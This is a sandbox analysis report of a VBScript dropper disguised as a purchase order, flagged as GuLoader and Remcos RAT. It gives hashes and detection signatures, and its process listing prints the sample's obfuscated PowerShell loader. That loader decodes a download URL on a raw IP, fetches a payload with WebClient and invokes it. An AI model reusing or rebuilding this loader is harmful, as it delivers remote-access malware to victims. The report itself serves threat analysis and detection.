Edit tour
Windows
Analysis Report
PO_La-Tanerie04180240124.vbs
Overview
General Information
| Sample name: | PO_La-Tanerie04180240124.vbs |
| Analysis ID: | 1431648 |
| MD5: | f08f508e797fa19d89a8a4688019fd99 |
| SHA1: | 32de77ff5689fbc68f64aa9cfd4405cc2686fd85 |
| SHA256: | 610119f52d69e8132b0130740836426d0b25fe5300ee4e12f2c51d1e36fec546 |
| Infos: |   |
 | |
Detection
GuLoader, Remcos
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Remcos RAT
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Potential malicious VBS script found (suspicious strings)
Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)
Sigma detected: WScript or CScript Dropper
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Very long command line found
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
wscript.exe (PID: 6924 cmdline: C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\PO_La -Tanerie04 180240124. vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) 
powershell.exe (PID: 6228 cmdline: "C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "$Bastante resba = 1; $Excerptet ='Substrin ';$Excerpt et+='g';Fu nction Sug hs($Spermo phyte68){$ Scurf=$Spe rmophyte68 .Length-$B astanteres ba;For($Ba stanteres= 1; $Bastan teres -lt $Scurf; $B astanteres +=(2)){$An glophobes+ =$Spermoph yte68.$Exc erptet.Inv oke($Basta nteres, $B astanteres ba);}$Angl ophobes;}f unction Th iocarbamic ($Hydrodyn amicist){. ($St erlingkurs en) ($Hydr odynamicis t);}$udrj= Sughs 'TM oAzMikl lH aT/L5 .S0. (IWTi nPd .oMwOs. AN PT .1 0s.f 0 ;. eWViH nD6F4,;c T xT6,4 ;F D r vM:,1.2 1 .,0,)O e GGeCc,k oA /D2M0S1,0 0A1 0,1C W F i.r.e fH oEx / 1 2A 1F. 0 ';$L obularia=S ughs ',U.s eRr,- A g eDn tS '; $Daybeam=S ughs 'HhWt tLp :F/F/ 8.7a.R1Y2 ,1E. 1A0U5 .C1S6S3h/ .F l y,v,n iCn gKs.. u.3 2D '; $Cololite= Sughs ' >M ';$Sterli ngkursen=S ughs 'SiSe ,xA ';$Tha ilndernes = Sughs 'r eNchh o. U % a p p dE aGt aE%N\ E y.eMlRiA k.e.0 .aF. o,r H& &D Be cehSoT H$ ';Thioc arbamic (S ughs ' $ g .lTotbBaOl R:kBFaUc t Ce,r iUoSp h aEg oRu Us,=N( c,m ud, C/.c, V$ TVhHa i lBnIdAeGr nKe sB) ' );Thiocarb amic (Sugh s ' $ gBl, oSbBa l,:S DFiTaOsbtC eDr eso.i sEoPm eUrH =T$GDMa yS bJeTa.mK. s.p lPiSt, (,$ CUo l oUl iTtCeI )P ');$Day beam=$Dias tereoisome r[0];Thioc arbamic (S ughs ' $.g AlUo b a.l R: NAo.nUz eAbVrLaM= DNPe wF-,O ,b,j eMc t HS y.sLtE eSmB.sN e t,.EW e b CslAi.e.nV tF ');Thio carbamic ( Sughs ' $, N o,n.z e. b,rBaB.AHL e aGdAe r sS[ $ LioA bCuTlDa r iRa,]U= $O u,dbr,jA ' );$Nonassi gned=Sughs 'VN,oUn z eAb r,a . .DMoSwFn l Oo,a dSFSi lIeh(C$ D Ta yEb eAa m , $ FHo nRt,eTr.n .eRsD7P2 ) B ';$Nonas signed=$Ba cteriophag ous[1]+$No nassigned; $Fonternes 72=$Bacter iophagous[ 0];Thiocar bamic (Sug hs 'F$ gFl So.b,a lF: RGAebn.kSo mSsRtReDn ,sT=.(.TBe .s t -dPLa tAh J$BFC oSn,tMe r. n epse7 2 ) ');while (!$Genkom stens) {Th iocarbamic (Sughs ' $FgllHoFb, aGl,: F jA osrDt e,nR dMeAd.ealF eF=A$ tLrR u eD ') ;T hiocarbami c $Nonassi gned;Thioc arbamic (S ughs ' SPt Aa,r.tH- S lUeOe,pP 4P ');Thio carbamic ( Sughs 'V$S g l oCb,aU l : GSe n k oGmSsPtF e n sA=G( Tke,s,tN-R PSaGtBhA M $ FPo n t, eOrAnteOsD 7.2D)k ') ;Thiocarba mic (Sughs ' $Fg l o .bKa,l : S JtUr.aAt e g.iDcWaEl ,=S$Mgkl o PbEa,lS: S e rLgCeVa ,nNt.s 2,3 N+G+ % $ D GiEa.sRt,e ,rSemosi s Bo,mVehrb. cCo uEnCt ') ;$Dayb eam=$Diast ereoisomer [$Strategi cal];}Thio carbamic ( Sughs 'P$, gAlMoNb a l :FPSrBaE eRlUe,c tT oBrP S=, I GOeStB-CC o,n t efnB t u$.FDoDn Ot evr nDe s.7V2T ') ;Thiocarba mic (Sughs 'O$ g lDo DbHaLlM:,F LiRjFiaa n Oe,r eCs L =U E[ S,y sPt,e.mH.M CAo n,v.e, rDtK] : :S FNr.oDm BK aBsEeP6U4D Spt r isnl gE(C$ PCr aVe l e c. t.onrV) ') ;Thiocarba